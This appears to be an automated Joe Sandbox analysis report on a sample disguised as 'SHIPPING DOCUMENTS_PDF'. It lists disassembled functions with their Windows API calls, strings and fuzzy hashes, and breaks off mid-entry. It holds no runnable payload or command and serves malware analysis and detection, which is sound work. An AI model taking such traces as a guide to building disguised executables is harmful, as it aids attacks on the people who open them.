                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BB537A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$_memmove
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 2279737902-1007645807
                                                                                    • Opcode ID: 3e851f5ca6a8c51067fd76acf6955e169313833c2095916bc788f9a8531ac1e7
                                                                                    • Instruction ID: 7aadb9e0a380cd0c097c76939a7d498d12ea00950aa355dbd11fc8a5da200257
                                                                                    • Opcode Fuzzy Hash: 3e851f5ca6a8c51067fd76acf6955e169313833c2095916bc788f9a8531ac1e7
                                                                                    • Instruction Fuzzy Hash: 9111C430A901297AD720B765DC4AEFFBBFCEB91B41F0004A9B802A20D1EEA00D08C5B5
                                                                                    Function 00BB46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 208665112-3771769585
                                                                                    • Opcode ID: fcf2997a215c8f3f1c900b5db004feed5b04a1755441fe0c7c4159cc13fe61c0
                                                                                    • Instruction ID: fa115367fe49d0bda050ab425e4883147d5ef79e1b1d9c0bd7354b2e53211930
                                                                                    • Opcode Fuzzy Hash: fcf2997a215c8f3f1c900b5db004feed5b04a1755441fe0c7c4159cc13fe61c0
                                                                                    • Instruction Fuzzy Hash: 9611A135904115ABCB20AB319C46AFA77F8EB02711F0481F6F45A96192FFB18E81C651
                                                                                    Function 00BB4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 00BB4F7A
                                                                                      • Part of subcall function 00B7049F: timeGetTime.WINMM(?,75A8B400,00B60E7B), ref: 00B704A3
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00BB4FA6
                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00BB4FCA
                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BB4FEC
                                                                                    • SetActiveWindow.USER32 ref: 00BB500B
                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BB5019
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BB5038
                                                                                    • Sleep.KERNEL32(000000FA), ref: 00BB5043
                                                                                    • IsWindow.USER32 ref: 00BB504F
                                                                                    • EndDialog.USER32(00000000), ref: 00BB5060
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 1194449130-3405671355
                                                                                    • Opcode ID: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
                                                                                    • Instruction ID: cb036a3715abc8a16d30c101f69e75f99a370f297fc1303af68f826b578741fb
                                                                                    • Opcode Fuzzy Hash: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
                                                                                    • Instruction Fuzzy Hash: 0421A47060A606BFE7206F20EC99BBA7BEAFB57745F049065F106831B1DFB18D00C662
                                                                                    Function 00BBD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BBD5EA
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BBD67D
                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00BBD691
                                                                                    • CoCreateInstance.OLE32(00BE2D7C,00000000,00000001,00C08C1C,?), ref: 00BBD6DD
                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BBD74C
                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00BBD7A4
                                                                                    • _memset.LIBCMT ref: 00BBD7E1
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00BBD81D
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BBD840
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00BBD847
                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00BBD87E
                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00BBD880
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1246142700-0
                                                                                    • Opcode ID: 8c2225b27903635ff45f355fc42f7a88959ea7c6b09d52c14aeebf91529ab192
                                                                                    • Instruction ID: 91660e0d525a9f5140464eb1dc15583267e9ca1d5f502f3a0e23e90fca5e12a6
                                                                                    • Opcode Fuzzy Hash: 8c2225b27903635ff45f355fc42f7a88959ea7c6b09d52c14aeebf91529ab192
                                                                                    • Instruction Fuzzy Hash: 69B10B75A00109EFDB04DFA4C894EAEBBF9FF49304B1484A9E90ADB261DB74ED45CB50
                                                                                    Function 00BAC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00BAC283
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00BAC295
                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BAC2F3
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00BAC2FE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00BAC310
                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BAC364
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00BAC372
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00BAC383
                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BAC3C6
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00BAC3D4
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BAC3F1
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BAC3FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
                                                                                    • Instruction ID: b0c70ba9592c5390f16ff806ea708c348c804bac766d7e55a22683940cdced0b
                                                                                    • Opcode Fuzzy Hash: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
                                                                                    • Instruction Fuzzy Hash: E2513E71B04205ABDF18CFA9DD99AAEBBF6EB88310F14816DF516D7290DB709D00CB10
                                                                                    Function 00B5201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B51B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B52036,?,00000000,?,?,?,?,00B516CB,00000000,?), ref: 00B51B9A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B520D3
                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B5216E
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00B8BCA6
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B8BCD7
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B8BCEE
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B516CB,00000000,?,?,00B51AE2,?,?), ref: 00B8BD0A
                                                                                    • DeleteObject.GDI32(00000000), ref: 00B8BD1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 641708696-0
                                                                                    • Opcode ID: 472b4b7b58219ee97bbc7a65ae543fef088d5c45faf3503393708d40f4ab4e13
                                                                                    • Instruction ID: 3edb541e005aa92e5da77c03454b8b466efe1eb6407db80d947d56b7774dda68
                                                                                    • Opcode Fuzzy Hash: 472b4b7b58219ee97bbc7a65ae543fef088d5c45faf3503393708d40f4ab4e13
                                                                                    • Instruction Fuzzy Hash: 3161A131502A01DFDB35AF24D999B6AB7F1FF82312F1484E9E94257AB0C770A885DF90
                                                                                    Function 00B521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                                                                    • GetSysColor.USER32(0000000F), ref: 00B521D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: 230d07eab4574993594615829c7a7ae8e1e9c0fb853c6613399d7b56d516eb6b
                                                                                    • Instruction ID: da9e0770cee454b2aa1f6ca3cf508f0e0d2c0f77f83b7ee333b67642ebedd1a2
                                                                                    • Opcode Fuzzy Hash: 230d07eab4574993594615829c7a7ae8e1e9c0fb853c6613399d7b56d516eb6b
                                                                                    • Instruction Fuzzy Hash: BF41A335006540DEDB215F28EC98BB93BA5EB07322F1442E6FD659B1E1DB328C46DB11
                                                                                    Function 00BBA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,00BDF910), ref: 00BBA90B
                                                                                    • GetDriveTypeW.KERNEL32(00000061,00C089A0,00000061), ref: 00BBA9D5
                                                                                    • _wcscpy.LIBCMT ref: 00BBA9FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: ab0356434cebf759f7f86e7273152a03fa64e032a8d1fe669bb5861b04abe7d2
                                                                                    • Instruction ID: 1a3ec61e54c088f21d70bcd3b0b33f04df75c22ada0c9956bb5e894337afa009
                                                                                    • Opcode Fuzzy Hash: ab0356434cebf759f7f86e7273152a03fa64e032a8d1fe669bb5861b04abe7d2
                                                                                    • Instruction Fuzzy Hash: 06519A319183019FC710EF14C892ABEB7E5EF94740F5488AEF896572A2DBB19909CA53
                                                                                    Function 00B59837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 421087845-2263619337
                                                                                    • Opcode ID: 855bbbf9a699e8aba5dbc7b6a93cc144a40a91b461821a3e4a603237613ccb58
                                                                                    • Instruction ID: 041f304e7c98a297dec2dfd0fc52e30dba6d9ad75f7269b44748f8b74e5d7ef2
                                                                                    • Opcode Fuzzy Hash: 855bbbf9a699e8aba5dbc7b6a93cc144a40a91b461821a3e4a603237613ccb58
                                                                                    • Instruction Fuzzy Hash: CE41D671614206EFDB24EF74D882BBA73E8EF15300F2484FEE959D7291EA319946CB10
                                                                                    Function 00BD7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BD716A
                                                                                    • CreateMenu.USER32 ref: 00BD7185
                                                                                    • SetMenu.USER32(?,00000000), ref: 00BD7194
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7221
                                                                                    • IsMenu.USER32(?), ref: 00BD7237
                                                                                    • CreatePopupMenu.USER32 ref: 00BD7241
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD726E
                                                                                    • DrawMenuBar.USER32 ref: 00BD7276
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                    • String ID: 0$F
                                                                                    • API String ID: 176399719-3044882817
                                                                                    • Opcode ID: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                                                                    • Instruction ID: 36f2face16ecb11fc6e2fc637b16d71ba031e5169cc7b50adb4c454659f81302
                                                                                    • Opcode Fuzzy Hash: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                                                                    • Instruction Fuzzy Hash: 27412874A05205EFDB14DF64D884BEABBF5FF4A350F1441AAF905A7351EB31A910CB90
                                                                                    Function 00BD74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BD755E
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00BD7565
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BD7578
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00BD7580
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BD758B
                                                                                    • DeleteDC.GDI32(00000000), ref: 00BD7594
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00BD759E
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BD75B2
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BD75BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                                                                    • Instruction ID: 776f3085788f1a3168f006a1c579c28191331c068179fd6639a5b8e6d9986b2a
                                                                                    • Opcode Fuzzy Hash: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                                                                    • Instruction Fuzzy Hash: 40319231105115BBDF119F64DC19FEBBBA9FF19324F114266FA16922E0EB31D811DB60
                                                                                    Function 00B76E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B76E3E
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    • __gmtime64_s.LIBCMT ref: 00B76ED7
                                                                                    • __gmtime64_s.LIBCMT ref: 00B76F0D
                                                                                    • __gmtime64_s.LIBCMT ref: 00B76F2A
                                                                                    • __allrem.LIBCMT ref: 00B76F80
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76F9C
                                                                                    • __allrem.LIBCMT ref: 00B76FB3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76FD1
                                                                                    • __allrem.LIBCMT ref: 00B76FE8
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B77006
                                                                                    • __invoke_watson.LIBCMT ref: 00B77077
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                    • Instruction ID: 971e340617294d8811cb2ad45ae647be3a8a559877337b8f2cc689f7f1b3ab1d
                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                    • Instruction Fuzzy Hash: 3171E876A40B17ABD714AE78DC81B5AB3E4EF04724F14C5B9F528D7291EB70DE408790
                                                                                    Function 00BB2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2542
                                                                                    • GetMenuItemInfoW.USER32(00C15890,000000FF,00000000,00000030), ref: 00BB25A3
                                                                                    • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB25D9
                                                                                    • Sleep.KERNEL32(000001F4), ref: 00BB25EB
                                                                                    • GetMenuItemCount.USER32(?), ref: 00BB262F
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00BB264B
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00BB2675
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00BB26BA
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BB2700
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2714
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2735
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
